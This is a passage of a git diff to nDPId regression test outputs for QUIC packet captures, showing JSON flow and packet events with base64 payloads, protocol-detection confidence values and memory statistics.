{"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1616775370815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":116,"pkt_l4_len":62,"thread_ts_msec":1616775370815,"pkt":"AAAAAAAAAAAAAAAAht1gJDKmAD4RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvlxgA+AFHEAAAAAQhbtLKZy53KxAjsAiiM0e27twBAHLMBaZzti3E68kx9gE3ZXKGXRNRnGzCRKG8UNXw="} -00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":3750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1616775370828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894473 bytes -~~ total memory freed........: 5894473 bytes -~~ total allocations/frees...: 118160/118160 +~~ total memory allocated....: 6028107 bytes +~~ total memory freed........: 6028107 bytes +~~ total allocations/frees...: 120922/120922 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 491 chars ~~ json string max len.......: 2186 chars diff --git a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out index 12a35ce75..1f383fed1 100644 --- a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out +++ b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out @@ -2,527 +2,527 @@ 00590{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1621417111064} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621417111064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111064,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTFAAH4RUm+FzUvm0OWdUdzQAbsFTtRayv8AAB0IRl3KXBW\/LTsAAEU0Yy4h2W7s\/rlLefIGYQnrzU1ux8x1WHF9P2TRMM\/uMgrk1ok5ld99474sHzCIsmBaABMBQuwajfiOypF13LdOvUbny6sKbnPsiQnWdRy34WzYDIUSWbFA\/\/FyZAuWdhVQrY6b6y6LN19n0\/TyiwQZaRgOj9Dah0V5ZEaARpJrDY9m+9WAWL1E5fl0AZB5oVrpfRpwU+72dTHjTrdezZLrG0y4LUZJV4ZFSW\/bOTNeyiYeeLzss7MCM0o7kz\/ABmlsvSTXlJ31WdTvcFfKZa+Ers7MX6vrMreYIDLD\/ts+djqt3oepBEPH1tJwybSyF6zOUmcUZSNjRN66q7NkOjxIFsUfL6vSIfs09kF5zqgt+spL3nfMkmEEbIE7Yb6VRa8aqO8bYrkMWyfbFbPBKBEuDwvxXHrKHBxwnW70rIsunEzXSGSfZXttskCHI36aQkPEEfMaooCWLD7F3ek7vQfYF9UBeP3UInD1\/fYOKKyXlh8f1Xhf5ZtTg\/t0H\/rYsiKjt\/tbN+4cOfHmb\/PbJuLAirrGtMROug44tuDQNDgTnWYAQeXIGrimS63+Je1xn8is8IMmIBVJgnKtBWcrkpMXG4qIednOh1PU3Q9\/9otFQnmPpsVeluBrkhgnE4Pv+jN7MB9MKsGF0sSC1rOxFEUDC1ZncrKF2pLDQgCdTsCDk\/CcchJ4M3KHS9yCURHTTnwtZtZ46Ba107K6\/C+vDHLLH0Agtie1px7EDwsBP1SFcU808ARQb8bGLCOen2251sgfs22LC0YsewZOMJW3COsMT7VTAQC4PFSt3Jgg155O5SMOBejKszFjP0ssLTQ45nlMeghvKmzI+zfNFO+kmZxhFyxqPlrgdV4WKrdIRZR4IDXMiiBpWoClkuM9Kcm+TctK8hPDBFox7OqpdBdHkgRVzggkNVEFUCJAoy7stynIye5G\/c0PO6aK2KvGAn+3yIbnJQO+GFl+DzzTQ5+znvJKlrrHbZJ0Q4s6V8EP7sXEgs1jrGqyCGI9wXbSo\/8wFamlp4ouFVhBqYZQ6GonLwcM2BL2EqcW1GrumcxSrpctIQbM+MLM5TmZnDMpdMZpkkzZ2HiMH1e4fDgQ6yg7Gbq1oSAP7PmPqOdaH3pXDqIE+0KyN656ZdaYb0ZW5qVxVZ\/yglBSCDTTcv+oiZZdzI4cH8Dg9AnTIhGYs97IARnzPncHqS984seVJsVe3QFzlkq7PW\/+y877P\/bFA\/sin28uLWX7d3K3IUeguTPHXWFnBk90vEPoVwUYyj9ACpdxWLYAzshM8UJ\/W4931weL+9Y45JP53CAvIUGXcyWPEbA\/HUlyizs+gfbouzc6njtiCnSFNiKixMnDd6GnBIki\/6nDKciwxPCTmggZDjKRSkhR0fon1nZO04Oy+GPjSKqyuI6I5+\/qz+87W8lrtdNnV1MTgqqBXXhQGkloYjiOOO7Hr2euMPx\/D8ZUBmzjEl1Q0vybg5VizAcIFEitV672m9tByJnZVCmqOqHSsQyStHmvXtcHwG3FmgKLlqDELNJ8refw1BcltymiFpTUHXujIq2m\/2R5lxEp3IZpg0ykJqHmAP8x1DQP1O+gpnkeZMlBn7sZgxbS5i464ONO4aidSpGEEs44YdZy\/0PLNXvbgohSN7NSSlu\/3OBSZTCjfEOkPRu9fd3b98IylU4SIOzNDcculUBKrCHb5iJqK3HKWlgukxdQQwzwn9S7alNQY70dsl9vUF76RPML6stNu2Zb+\/ZYxqaJZFu3FOvrYcXEYKZuXML8FedF"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621417111365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111365,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTpAAH4RUmaFzUvm0OWdUdzQAbsFTjvyyv8AAB0IRl3KXBW\/LTsAAEU0xBtknC+XTdZGN6290CAoRKHgbmKFJg3HBwc\/jHUJwoDaxdFeYCE0Uygz+VHs0HUnI94AbjhHMzRan2kJrzGOLsIFVrtNzL4OkTEDJq3UUrfyDciR9qccsfqQIGKe4+mov72jtae6dT46hkQ+QTnI3qa9w4Yrz4KUlPgfO9zVCT6mXSXTofwnKS6Qfdj9S7TH8yQuxrRDtFQWnhTNy0t1UKhz6qr7HZc7OXUxuEatCLs0GM7RQ5XDRBXA5afG92SX13U42sqpyR2Dqucjmfwt+AZJqZxKZ88XCAoPiBg1nhBBqlcLQi5b55SXRrj8J15Ch8Ci4CxPCOPzc3h\/5D7UZhbpjLoo2\/wZisT7R7KxaJ3ST2sZ3au5Hx19NvbHrwwXFyjsVWmpBliZAZ1eg8gxdq7r40u+8bSjNep5S5X4zhf+AkNuV8jevuxbg\/UwlzjTe8n2vKNO4Sn8ezT9DiH9wVxoqUgUC56J5Bw\/YU9h0I7kitWH4Ge0BODww29+Aa48fFyudGGRJr0yq65POy0\/nSLbvLGqwZp1zhAkIqUsP2zPPDhVLcbkKuUbzbLDncwcQqWbszMpdX6XQMob8NEqfarZfUbWlLQzVqNQ8t+rVuxO6E0Y5ROaqgvU6Iaw65vnffX4bnfiGXYqsNiOtVcC0AGzgdFbgZHuv2Nb7kc0byRUKspz09Wn9zWhuGfrICjWmqrB8Q4VPqUOIqhoqXlkGkHNbJf58PajF6nNTpLrSKS\/s7\/PAyhgL493GmYSfIy9P3KtC5vS4Ku0zGWvDo8SCxhl8hUKOnlaSGpXqSRi3sgHur0sAZSPpYHgQ9ljywBydFstLrd5zZwAxQ9+vV2dyvl5E10qbt3utWTyQBXOGM8+cRbZ3IceK6X8lmEcVSe\/lGIY3L8lM0BH4NVdxflARe5x27az2293PuYiWrepjLgL\/t8GJnVIEAfdEDDv6nlOl6fweFWTAviNX0n7H23ADHXDBJoQegMO44JmGpnPyeZ7peOilpkbWx9ATq+r0mZxbasRl34cc\/qUozcfhHeRKRw+hYpaT9CQZ8AwobPmbBbge1PnLbS9EJ6KIdeNM1xvj5qNQCPpdp21psJ3+wuxB5WdrC5cRGmW+pfRGXkJSm\/Hxm9DB2tYY3zfLjAKMpqTNWMC4tSeo7z0jU4yjg\/Y6fR198VAyclvSR0O5TVO1oliLvxo8sV\/3pO0ZQdkjztGQDklMECKRLmGHWeq07ToUjA7\/uq\/1q1ZaVKO9+hzMdiy8RW\/albPHuZmkMcv\/hdmGmUKrlNaBelZYm3JHfkOkgTs5ncd6giTGx3+gp+77n0Cl2X\/UMETVoN6eJC2aNdjH04XtPXdO1zEfHQdKIZ6vLfMBFcb6lyyBQHYpxqMpjOmWiEaBu7NBDgbODnVf+Tvq7iqc5vUfezJABJgNs+wQkFHvjcnsWbt8hd4lnshRnhfEICGBWv6UJsU9Ov4RS1eWGN6u+WJZ1KqUjcUa+wjrhijbGsQMvjESucpeFe9xpKA8HAlnPSJl2ONIdzQBHu\/3yzS9u2h1V7df8T\/i8Gdlu6HB93T89Yjw6chn7zm7z2FtGgcebdYl7BpQRSNjPJz84wtrOqzP5VkldxWGcJvvM9JiOiFsmosV0YXCCuN0S1I3GD34RZxvxyg8ZUjvsqRi2E\/iDILq6\/FEFNEDKUPx45Bzam\/QoSbKhlDZxaUjzLpRLnCd58YA3T6qMB7hBeBBV7m2MJBvTY86h+TNrfUyh9Qv4iQnqyGKkFDZSiO1ApSSgUS"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621417111974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111974,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTtAAH4RUmWFzUvm0OWdUdzQAbsFTm5izf8AAB0IRl3KXBW\/LTsAAEU0CaUDKN+7HQerWxWNaxYxCvRcfnKOO+ybfMRaHlMyLV5\/ifvLi6NsRKmbKUNcCUu\/u\/M1kQX89iC1g71EFL9hpQHjoogBRK6XO2cU5STf5N9JHAk+8BPn45mxnB29aiUjdM+EAfIXepdjDNQjKc09rze1a+uHtprZ5+Ycrj2s1oiuYYUb9FANNRaKrpCGh8Q1rnRYx770sBfzPHCd4rH7ygHAqZA9rzQXUKNYFjXghCcBZatYZ9Q8JwAA\/fKY3\/lIAOVtIUm1GWVWJWRArYGxBCEQZpeN5QPlw8cLblO\/3AfsaykEWbI69jFCOGB2jUptGYOGveg\/lWTYc3h8ky83fW8GcKmxAdv74r3jjdjUEQwR+OklxSw8nZmJJz7vOIvvqHsGajXpc6slDSCi8t109u4JP5JW8jD8wB8Wu2rMNkpmGllvnJajJlPlmNcv1t63eJQ7tGt9eGqHfIOgL9TpzURHNTm6hgSstuIpgK9L38bDpiposW3bHdNdiSGW8YfcnS01KCB9zAXNkqgfNlW+GnajZiezd1EJNTKChMtZV3oLfDVU9cARvR9xtldNProWOwXOZYPAYtfMb\/io\/Vu5CAxNRhauAQj5iV37FvKMgojNtwe3JiavKcD\/FRmXzVU\/VpRWC0bmuCqHRqGUFP1t+DceGKbtne8WNVu\/xmWJrd890soACDHC3pcknd\/nHK1UlwSNkQ8SpuBtv6Dp3ZFRJdsGRDvauS+NTENiJpqioBeQmjGdksZRA0\/zyeeZ2tToLKwCsABDpjD3wQPTSgs\/QdPv\/A5+SuOjcGiYVuktFgslT0Wy1tyms3TA36Wcl6ZEPkQlM\/omx0Cr54NreGjEi+Vm5kYjmT2fnBvf2AQ12Dg9A+pCWtWa4LMGgtYYMDVRRT6vqKnhbVtxxQSAh\/MWBMyqiQHkkkf\/vXhJ\/dOU8N1Fd1mO1KBRln61my9oJczDOwipHZPAlr14xAsdkdGB\/+HZ8ppEuJtqtkEtcOw9xjC5dCPbakUtfuaLzDo4DHXPrpt\/f+rpZlU81EBxJG0afG0vQOyE3ZuYMlkM4IVgPqMx+uzy+sK+2o1w+yZCywDlXOysJF2R8BE\/KVLZRpL6uxsfUOFnHV4VQFOd3VwykNOtm7wpKwJ8ySG1VrRqSLuw3SlZ8dJXFZ8gIUVHRRjp13ey\/kua7zLPrAEFz2vf1ZYTZ5m6U9KeweZA3wPOuih84JbuHHl9vlsWDb7s9qrasejaGIRTS0yaEkKOXG2aXkwOTKzHvuE0KuunSsQcA3e6JAQXrlvgeRH7cNh8q5Noilga8Iz99iaZ+tph0kvufCI2CHlp41du7sNXnyC2d8RZPQAJe7D4Oh1BQLIpaX6IjRHr6Znht5L0l2uxz2PQHcoUX6n4t3dcGi25AwHjP5I3uYq5MEBsM+ufza0eSWH\/9ZccO0cIAXaM\/ZK7yJ7h18lQa\/XrC6T0H+iG6YLcBs+Nn\/WpfxO0X+Fm0xBv3kc6fJmlJHPrTgM+FCizZiybSl6ku\/j60rHDQ06vpIkk9ZS53KSJzAVvHcMEw4RS9GGhlSYAJux\/nZp6xaRxVAmLGayjkrZg4JqrAaYLUFPZxCYnoaoOUed39DfjyYIGdVO+lFtX93fPnuewUpoX+KmbQlR7Ka10pukI4fioRBdFHiEB\/Gn89KrwhW6ASA0p9Q0Oc5cBfAuigzZZU2MmQFjJi2zpQVTe\/5PEXmeSFsWQCTH3gUt8UDEky7qzZgA+xFi531EMe\/QX6lWUAbOhV9FlVkAVMO+3"} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621417628801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417628801,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsBAAH4RzreTxFoqsVYuzvDPAbsFTkiRwv8AAB0I+raMAglwITcAAEU0GmovP+mvsihl\/92QhcJt6i9xOCuhIR8v+QVQPDfpj6BytKt4QkFnLk36FAbt80sJIp\/Y2c7pKVYoBF6gfeinYt9EQsJeq7ROnY3ivJapj2oaHwAzsZa4wHPnbSp5Fzk6+XETr+Q0x6NnHbM3zNCM2AaHMspi1VAViZWQsrRPrT26HUJgBdgrtSBr704DAlp8NIBOTaYQmRsLw0sO8kaVUQSTjBt91sODuXuJFBlvmd0rw7Lx9XhhtXOEq8peMATmMSiGkCnVtuHU9IHl7xPdTUKOwX+iqBEfcVUDuMTWTQ+xEjmygydvmbpLt++lwihva2qbwF6QkkfAhzI1WNSSRrlwUFqM+Zsvtnl9miygOu3MVINYanFJshDLLhtcYcppiQUtPQh8neggpYf3NcqHcOg9yFih0GlvYXJgOAi0eylABT+cl7jZZQ2\/9NICqkeHp5SgtJZ+rnT0jfRUKImzpisiXxL0gUjRhZOBaNVTw2DFuXCxQsKg\/KU7zvbCtbjOLcFIvgcvLg+YOzho2mATZS9Qfa20oAzRIDxCf0U\/g2Kp\/RjvwWjL8Qf3VcFus3W9PJibs38Cnb8fC1OmRScNRTKV7pwvzBngo0k14tTrnFD06xzFU4K0vUGZStljl\/FAwNVIMnRWjsQn89AVyrUyoiyAS9a+w+Ol\/IuzeZupo9JHvpafoLvt9p341rnuNTMpuiggzG1a\/AJiehCdHVju6FHVk25Y\/MvQwUZ0i\/jES6yQR38oUqlnXVrq+fKrSE\/9kcUPuinfPVwCAVdLSD\/ha7TenkHZGDajCF77P2QxcTnluKJdVrDlQTARcyFrPTPqYJkQ\/NBO4Q2LUqkPKdSNg8BTKf9ErnqfzfLyF5WoMGjiT+xKiXVVojRktrJCp1vh\/UQZ5GB7zhzqnM6KrzPyc3Lxp3Bb7qVApnsRGOqMr1ngaD2S5zZ2FCX87pAvyMSivW4aYtM\/FgZ5fi1KOfYRKUUTVabBR4V0TSKE6XBOLGcK6tn4xBlT4YzAm4R1HLGrMHJVUw1kbq8I1GPUl2Oe80wpsoTflQ\/7rxCHFRENvTpUYufeWaZVYdHvgsMahyyxgCBnT2nc01NamKM3ocOAfaIGcBY\/TLk5FbdJIlfNuzsvYmFgqC9vpu4ElbzDnAVfSEDcO9fSa+\/JxpgCfB9tsQNpFDTYAu1e0Ss3GB+O8aZWjtRVkhzocpK8euQFsHuPNYkc0XzFUPsLBkPlcmTbK4YVnrIapDZ744rfE93ooFZIUkO7Ch8oLzqK0OtBOsGmVGFTbaVf+NhQknLLOENbTcHT7F0rxbWFDU++4qTR\/XmfJ+wUTJsT+\/quj3VddN9kLF9L9a4EgHNqz15osfhMQWW+l0C3k2t5fh5I4ZCw28kLSE6kXpe3jSgb7PvPC1LSkSgWYuXB89Kj+qTD\/cFbalGxIJb\/WgzJZn6Gd7R+R9Uf44YjcRfaKor1OTqri0mpCgDnlcKZQFUkScXWdMFAepcOEwVDvTUtXG4T0tMPM\/db0x58pCBeZHjWa7wiz\/JWqOATbNaNGCr6YxqPK79sl3n3mgQubt+x0eKINEGpxaZgah4UluP1BWQh4YfISLcQeFbuVb8GjyINELyA1nqZY4Rm0zHf5sR3fkBxRXy8m7315bG8d2eGbZxchn62uWz60SggwIYaJ0ECuYBFMzQZtKNYAvyGaZftALbKhVzxh7mgcomFyIRc7XwzM56SXrPBzXgho48l4M8VVXrs3DqFKC1\/kSw7iV2kg2+Vlrpf6i2uga0t"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621417628930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417628930,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsRAAH4RzrOTxFoqsVYuzvDPAbsFTm8Jwf8AAB0I+raMAglwITcAAEU0pjC69lxL17I2Vm\/2Q1yiyTryhXfWfRIufhNP5rg4c+FEuOp6GqQUQFPIcqWk6U0BDlkVmnmwl9dIFWmX\/bKzitGvZ8mfDi9hktZWexq37TSuAH96QNRoeDy4tvPiSgKIr6FZgR4Q\/HVISWRrxFL0ZKD38sgIoVYjPEx\/9Ic4WOpPiBg1t9\/qrhQHH9cTVMgWsLt0TDJTL0KZv3cMnUOIyDfZegNZ4jvz12dVBYTIdmKO7+1d6Z2\/OF7H8egyUhxpPD8g63YnzjMgsOVESGTopFXkRNnrC5YYuCPBc4+8zyPzWbaRA7ZY7Dj7GHebUIt0h3Gw1DMiRq+wjLGQycx78BHNpTa91SU5Z8OasixP0ARhcYJ7QKV8jqRLQIZ4IpBhgMNdrO8Ggn4V1al1n25AZ\/Lyk1mcCfIi5OinaMRv84l92mkzRek7AiZLH1nKN7U8\/la6FOtm5DE6vEcr9GZeZ4g8aHUkwBMbmP+13DolPMOI6DGfrXzZ7dBsZ4wbQKaGjaOhZc874uKqQ4j0o8xXhMGNRmGzqEw0XLrhUHdOwIt3sXfKa0kWZzBhThe9vA5yuf2IJle4m+JLUJDIrj8NkmAliM5a1Ztu0S1CjbeZwlZNEfqXXuBJ3XmYBU6x4TRQAywkhzhzUXIItcWXIsLEo24LH25n3fHel8z8SAJtU1rYW4MJ3cHGCieRuLa9m5WyLoD8MhHU7jK16MqrtWsEA8LCVJ4hJcCGC0d0cGJ9TmpzgM8fitFGSMldwBt1v31w+KigRFbv3PGq15QaFu3Bc5ghmXY2tvuPrAPwDQ1dcf4BaQoD2VAGVaIncU5tvynrQteTCLDkNbf+kZJa2SKp54q2Z9Fns9c9jt0T8RlL2p3YHikPu7llSazlfLXFGeGzoDJGGsNxHPldt9to6lNcm7BdP4mkNcgatPDawW4pXv1ns4BEQlIqeGnHJbtHqijRNTuEtZwIuRhW\/Knz7OtExuPugeU8Zt\/GlPfZScOWlEiLrc05jYYCgWUXmqy179xmcMucA9Wtytp06aBHf+WfQ1fURy3jSmQ3NJ3gv81uQ5roWC\/f151I1SnpAuoNl\/wshFDWrHEG7wosMoA69VM5ioRjUH6Vw6vtLsEkJmdXHbiLelXmCeiv5o5cjuB7D+CLbcHnxi6S1s4ouqpxdZyMBB3jywu2tIYU4QKiN+fjaYMDYwpAzD5Jb2Fn5An8ebr2twQ9IO7dHcApVPzom1G8qYIs37w2OByHgFyhjSn3envhKGKlaF+DnxPnqjkcDSypaV6Xw6